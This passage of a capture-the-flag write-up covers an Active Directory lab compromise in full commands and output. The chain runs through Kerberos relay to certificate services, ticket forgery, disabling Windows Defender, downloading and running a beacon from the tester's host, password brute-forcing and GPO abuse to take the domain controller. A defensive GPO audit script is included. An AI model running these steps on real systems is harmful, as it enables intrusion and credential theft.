With the DNS record in place, krbrelayx was started as the relay server (it binds ports 80 and 445 itself, so ntlmrelayx must be stopped first), targeting the CA's web enrollment endpoint with the Machine template and WEB-01 as the victim, and PetitPotam was used to coerce WEB-01 into authenticating to the crafted hostname. WEB-01 obtained a Kerberos ticket for DC-01 and presented it to the tester's listener, krbrelayx relayed it to certsrv, and a certificate for the WEB-01 machine account was issued (ESC8):

❯ python3 krbrelayx.py -t 'https://DC-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs --template 'Machine' -v 'WEB-01' -dc-ip 172.16.20.1
❯ python3 PetitPotam.py -u victor.r -p '<SNIF>' -d darkcorp.htb 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 172.16.20.2
/home/Intrusionz3r0/Documents/Tools/krbrelayx/env/lib/python3.13/site-packages/impacket/examples/ntlmrelayx/attacks/__init__.py:20: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.11.54
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.10.11.54
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] Skipping user WEB-01 since attack was already performed
[*] GOT CERTIFICATE! ID 6
[*] Writing PKCS#12 certificate to ./WEB-01.pfx
[*] Certificate successfully written to file

Using certipy-ad, the certificate was exchanged for a TGT for web-01$ (PKINIT) and then for the NT hash of the computer account:

❯ certipy-ad auth -pfx WEB-01.pfx -dc-ip 172.16.20.1 -username 'web-01$'
Certipy v5.0.3 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN DNS Host Name: 'WEB-01.darkcorp.htb'
[*]     Security Extension SID: 'S-1-5-21-3432610366-2163336488-3604236847-20601'
[*] Using principal: 'web-01$@darkcorp.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'web-01.ccache'
[*] Wrote credential cache to 'web-01.ccache'
[*] Trying to retrieve NT hash for 'web-01$'
[*] Got hash for 'web-01$@darkcorp.htb': aad3b435b51404eeaad3b435b51404ee:8f33cxxxxxxxxxxxxxxxxxxxxxfbb8b675

Requesting a service ticket as Administrator on WEB-01

With the web-01$ account, the tester used S4U2self to obtain a service ticket for Administrator to web-01$'s own service and then, via -altservice, rewrote the service name to CIFS/WEB-01.darkcorp.htb. The sname is not inside the encrypted part of the ticket, so the substituted ticket still decrypts correctly with the machine account key and is accepted. That ticket was used with impacket-wmiexec to compromise WEB-01.

❯ impacket-getST -self -impersonate Administrator -altservice CIFS/WEB-01.darkcorp.htb darkcorp.htb/web-01$ -hashes :8f33cxxxxxxxxxxxxxxxxxxxxxfbb8b675
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Changing service from web-01$@DARKCORP.HTB to CIFS/WEB-01.darkcorp.htb@DARKCORP.HTB
[*] Saving ticket in Administrator@CIFS_WEB-01.darkcorp.htb@DARKCORP.HTB.ccache
❯ export KRB5CCNAME=Administrator@CIFS_WEB-01.darkcorp.htb@DARKCORP.HTB.ccache
❯ impacket-wmiexec -k -no-pass WEB-01.darkcorp.htb -shell-type powershell
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> 
PS c:\Temp> cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all

Service Version: 4.18.24090.11
Engine Version: 1.1.24090.11
AntiSpyware Signature Version: 1.421.1388.0
AntiVirus Signature Version: 1.421.1388.0

Starting engine and signature rollback to none...
Done!

PS c:\Temp> Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true
PS C:\Temp> IWR -URI http://10.10.15.44:8081/beacon_x64.exe -Outfile beacon_x64.exe
PS C:\Temp> .\beacon_x64.exe

Compromise domain controller

Reviewing the BloodHound output showed that taylor.b.adm is a member of GPO_manager, a group holding WriteOwner, GenericWrite and WriteDacl over the SECURITYUPDATES GPO. Since that GPO applies to the domain controller, those rights give a path to code execution on DC-01 by editing the GPO.

Obtaining taylor.b.adm's credentials

With no other lead on taylor.b.adm, the tester brute-forced the account's password with kerbrute against the KDC. Before doing this against a real domain, check the lockout threshold in the password policy first: a burst of failed pre-authentications like this locks the account out and is logged as event 4771 on the DC.

❯ ~/Documents/Tools/kerbrute/kerbrute bruteuser -d darkcorp.htb --dc 172.16.20.1 /usr/share/wordlists/rockyou.txt 'taylor.b.adm' -t 250 -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 09/25/25 - Ronnie Flathers @ropnop

2025/09/25 19:42:51 >  Using KDC(s):
2025/09/25 19:42:51 >  	172.16.20.1:88
<SNIF>
2025/09/25 19:42:56 >  [+] VALID LOGIN:	taylor.b.adm@darkcorp.htb:<SNIF>
<SNIF>

Bypassing AV

After authenticating as taylor.b.adm over WinRM, antivirus was found active on the host. To bypass it, a loader was crafted in C++ combining Early Bird APC injection, function-call obfuscation, sandbox evasion and shellcode encryption; the loader takes the RC4-encrypted shellcode file as its argument.

*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> IWR -URI http://10.10.15.44:8081/Intrusionz3r0.exe -Outfile Intrusionz3r0.exe
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> .\Intrusionz3r0.exe

With the GPO rights established and a beacon running as taylor.b.adm, SharpGPOAbuse was executed from the beacon to add an immediate computer scheduled task to the SECURITYUPDATES GPO. The task runs the loader as SYSTEM on every machine the GPO applies to; after a forced policy refresh it executed on the domain controller, compromising it.

[09/25 20:19:56] beacon> execute-assembly /home/Intrusionz3r0/Documents/Tools/SharpCollection/NetFramework_4.7_x64/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --GPOName "SECURITYUPDATES" --Author darkcorp\Administrator --Command "C:\Temp\Intrusionz3r0.exe" --Arguments "C:\Temp\payload_x64.bin.rc4.enc"
[09/25 20:19:56] [*] Tasked beacon to run .NET program: SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --GPOName "SECURITYUPDATES" --Author darkcorp\Administrator --Command "C:\Temp\Intrusionz3r0.exe" --Arguments "C:\Temp\payload_x64.bin.rc4.enc"
[09/25 20:19:57] [+] host called home, sent: 180264 bytes
[09/25 20:19:58] [+] received output:
[+] Domain = darkcorp.htb

[+] Domain Controller = DC-01.darkcorp.htb

[+] Distinguished Name = CN=Policies,CN=System,DC=darkcorp,DC=htb

[+] GUID of "SECURITYUPDATES" is: {652CAE9A-4BB7-49F2-9E52-3361F33CE786}

[+] Creating file \\darkcorp.htb\SysVol\darkcorp.htb\Policies\{652CAE9A-4BB7-49F2-9E52-3361F33CE786}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml


[09/25 20:19:58] [+] received output:
[+] versionNumber attribute changed successfully

[+] The version number in GPT.ini was increased successfully.

[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!


[09/25 20:20:12] beacon> shell gpupdate /force
[09/25 20:20:12] [*] Tasked beacon to run: gpupdate /force
[09/25 20:20:12] [+] host called home, sent: 46 bytes
[09/25 20:20:25] [+] received output:
Updating policy...

Computer Policy update has completed successfully.
User Policy update has completed successfully.

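What the step above leaves behind in SYSVOL is a Group Policy Preferences ScheduledTasks.xml containing an ImmediateTaskV2 entry, plus an incremented version in GPT.ini. The following Python is an added example (not code from the original report) that parses such a file the way a defender or incident responder would and flags the traits of this technique; SAMPLE_XML is constructed to the GPP schema from the GPO GUID, task name, command and arguments shown above, with a made-up uid and timestamp.

```python
"""Audit a GPO's Group Policy Preferences scheduled tasks for immediate tasks.

Added example, not code from the original report. SharpGPOAbuse
--AddComputerTask writes an ImmediateTaskV2 entry into
Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml under the GPO's SYSVOL
folder and bumps the version in GPT.ini; this script parses such a file and
flags what a defender should look at. SAMPLE_XML is constructed to the GPP
schema using the GPO GUID, task name, command and arguments from the report;
the uid and timestamp in it are made up.
"""
import xml.etree.ElementTree as ET
from dataclasses import dataclass, field

GPO_GUID = "{652CAE9A-4BB7-49F2-9E52-3361F33CE786}"  # SECURITYUPDATES, from the report

SAMPLE_XML = r"""<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <ImmediateTaskV2 clsid="{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}" name="New Task"
      image="0" changed="2025-09-25 20:19:58" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="C" name="New Task" runAs="NT AUTHORITY\System" logonType="S4U">
      <Task version="1.3">
        <Principals>
          <Principal id="Author">
            <UserId>NT AUTHORITY\System</UserId>
            <RunLevel>HighestAvailable</RunLevel>
            <LogonType>S4U</LogonType>
          </Principal>
        </Principals>
        <Actions Context="Author">
          <Exec>
            <Command>C:\Temp\Intrusionz3r0.exe</Command>
            <Arguments>C:\Temp\payload_x64.bin.rc4.enc</Arguments>
          </Exec>
        </Actions>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
"""


@dataclass
class GppTask:
    kind: str          # ImmediateTaskV2, TaskV2, ImmediateTask or Task
    name: str
    run_as: str
    command: str
    arguments: str
    changed: str
    findings: list[str] = field(default_factory=list)


# Locations a GPO-deployed task has no business launching from.
USER_WRITABLE_DIRS = ("\\temp\\", "\\users\\", "\\programdata\\", "\\appdata\\", "\\windows\\tasks\\")


def parse_scheduled_tasks(xml_text: str) -> list[GppTask]:
    """Return every task entry in a GPP ScheduledTasks.xml."""
    root = ET.fromstring(xml_text)
    tasks = []
    for node in root:
        props = node.find("Properties")
        if props is None:
            continue
        exec_node = props.find(".//Actions/Exec")
        tasks.append(GppTask(
            kind=node.tag,
            name=node.get("name", ""),
            run_as=props.get("runAs", ""),
            command=exec_node.findtext("Command", "") if exec_node is not None else "",
            arguments=exec_node.findtext("Arguments", "") if exec_node is not None else "",
            changed=node.get("changed", ""),
        ))
    return tasks


def audit_task(task: GppTask) -> GppTask:
    """Attach findings; an immediate SYSTEM task launching from C:\\Temp is
    exactly what the SharpGPOAbuse step in the report produces."""
    if task.kind.startswith("Immediate"):
        task.findings.append("immediate task: runs once at the next policy refresh, then disappears")
    if task.run_as.upper().endswith("SYSTEM"):
        task.findings.append("runs as SYSTEM on every computer the GPO applies to")
    if any(part in task.command.lower() for part in USER_WRITABLE_DIRS):
        task.findings.append(f"command launches from a user-writable path: {task.command}")
    return task


def audit(xml_text: str) -> list[GppTask]:
    return [audit_task(t) for t in parse_scheduled_tasks(xml_text)]


def split_gpt_version(version: int) -> tuple[int, int]:
    """GPT.ini's Version packs two counters: machine in the low 16 bits, user
    in the high 16 bits. SharpGPOAbuse bumps it so clients re-read the GPO;
    it should match the versionNumber attribute of the GPO object in AD."""
    return version & 0xFFFF, version >> 16


if __name__ == "__main__":
    for t in audit(SAMPLE_XML):
        print(f"[{GPO_GUID}] {t.kind} '{t.name}' runAs={t.run_as} changed={t.changed}")
        print(f"  {t.command} {t.arguments}")
        for finding in t.findings:
            print(f"  ! {finding}")
    print("GPT.ini Version=65539 ->", split_gpt_version(65539))
```

Point it at \\<domain>\SYSVOL\<domain>\Policies\<GUID>\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml for each GPO (and the User\ counterpart) and diff the results against a known-good baseline; an ImmediateTaskV2 that appears and vanishes between two runs is the signature of this technique, since the XML is removed once the task has fired.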
Credentials

Username       Password   Method              Scope                       Notes
-------------  ---------  ------------------  --------------------------  ---------------------------
tester         <SNIF>     User registration   DripMail webmail
dripmail_dba   <SNIF>     SQLi                PostgreSQL
victor.r       <SNIF>     Postg­reSQL backup   darkcorp.htb domain user    Used for BloodHound/Certipy
ebelford       <SNIF>     PostgreSQL backup   drip local user (SSH)
taylor.b.adm   <SNIF>     Brute force         darkcorp.htb domain user    Member of GPO_manager

👤 Users wordlist

Administrator
dripmail_dba
victor.r
svc_acc
john.w
angela.w
angela.w.adm
taylor.b
taylor.b.adm
eugene.b
bryce.c

🔑 Password wordlist

<SNIF>
<SNIF>
<SNIF>
<SNIF>
<SNIF>

Subdomains / Hosts

Subdomain / Host        IP            Description / Notes
----------------------  ------------  ------------------------------------------------
drip.htb                10.10.11.54   nmap scan
mail.drip.htb           10.10.11.54   Discovered via VHost enumeration (Roundcube)
drip.darkcorp.htb       10.10.11.54   Extracted from message headers
dev-a3f1-01.drip.htb    10.10.11.54   Found in exfiltrated email (analytics dashboard)
DC-01.darkcorp.htb      172.16.20.1   Domain controller (internal network)
WEB-01.darkcorp.htb     172.16.20.2   Internal web server

Hosts Discovered

Name     IP            Domain         Low Access                  High Access                       OS
-------  ------------  -------------  --------------------------  --------------------------------  --------
drip     10.10.11.54   darkcorp.htb   postgres (SQLi), ebelford                                     Linux
DC-01    172.16.20.1   darkcorp.htb                               SYSTEM (GPO scheduled task)       Windows
WEB-01   172.16.20.2   darkcorp.htb                               Administrator (S4U2self ticket)   Windows

Scans

Note the TTL of 127 on the open ports and the Windows Server 2022 OS guess, even though the SSH banner is Debian: responses from 10.10.11.54 come from a Windows stack. That fits the route table and ping sweep obtained later, where drip's default gateway is DC-01 and drip itself answers at 172.16.20.3, so the exposed address belongs to the Windows host and the Linux services are reached through it.

# Nmap 7.95 scan initiated Fri Sep 12 23:35:19 2025 as: /usr/lib/nmap/nmap -p- --open -T5 -Pn -n -A -oN 10.10.11.54_tcp_allports -vvv 10.10.11.54
Nmap scan report for 10.10.11.54
Host is up, received user-set (0.076s latency).
Scanned at 2025-09-12 23:35:19 EDT for 155s
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT   STATE SERVICE REASON          VERSION
22/tcp open  ssh     syn-ack ttl 127 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPM91a70VJCxg10WFerhkQv207077raOCX9rTMPBeEbHqGHO954XaFtpqjoofHOQWi2syh7IoOV5+APBOoJ60k0=
|   256 04:ad:7e:ba:11:0e:e0:fb:d0:80:d3:24:c2:3e:2c:c5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHquJFnMIhX9y8Ea87tDtRWPtxThlpE2Y1WxGzsyvQQM
80/tcp open  http    syn-ack ttl 127 nginx 1.22.1
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.22.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2022
OS fingerprint not ideal because: Timing level 5 (Insane) used
Aggressive OS guesses: Microsoft Windows Server 2022 (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=9/12%OT=22%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=68C4E712%P=x86_64-pc-linux-gnu)
SEQ(SP=105%GCD=1%ISR=107%TS=A)
SEQ(SP=106%GCD=1%ISR=108%TS=A)
OPS(O1=M552NW8ST11%O2=M552NW8ST11%O3=M552NW8NNT11%O4=M552NW8ST11%O5=M552NW8ST11%O6=M552ST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=N)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M552NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Uptime guess: 0.734 days (since Fri Sep 12 06:00:56 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   74.39 ms 10.10.14.1
2   75.72 ms 10.10.11.54

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 12 23:37:54 2025 -- 1 IP address (1 host up) scanned in 155.09 seconds

Scripts / Automation

Flags Discovered

Flag    Host          Flag location   Method used   Value
------  ------------  --------------  ------------  ------
User    10.10.11.54   Administrator                 <SNIF>
Root    10.10.11.54   Administrator   GPO abuse     <SNIF>
